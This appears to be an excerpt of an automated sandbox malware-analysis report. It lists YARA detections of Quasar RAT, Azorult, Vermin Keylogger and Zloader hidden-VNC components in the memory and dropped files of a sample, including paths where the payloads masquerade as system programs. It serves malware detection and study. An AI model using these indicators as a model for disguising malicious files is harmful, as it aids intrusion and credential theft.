Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C7D800 CreateDesktopA,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,lstrcpyA,CloseDesktop,

5_2_00C7D800

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: CVbJSUXraQ.exe, type: SAMPLE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Zloader hidden VNC Author: @VK_Intel
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE	Matched rule: Azorult Payload Author: kevoreilly
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar RAT Author: Florian Roth
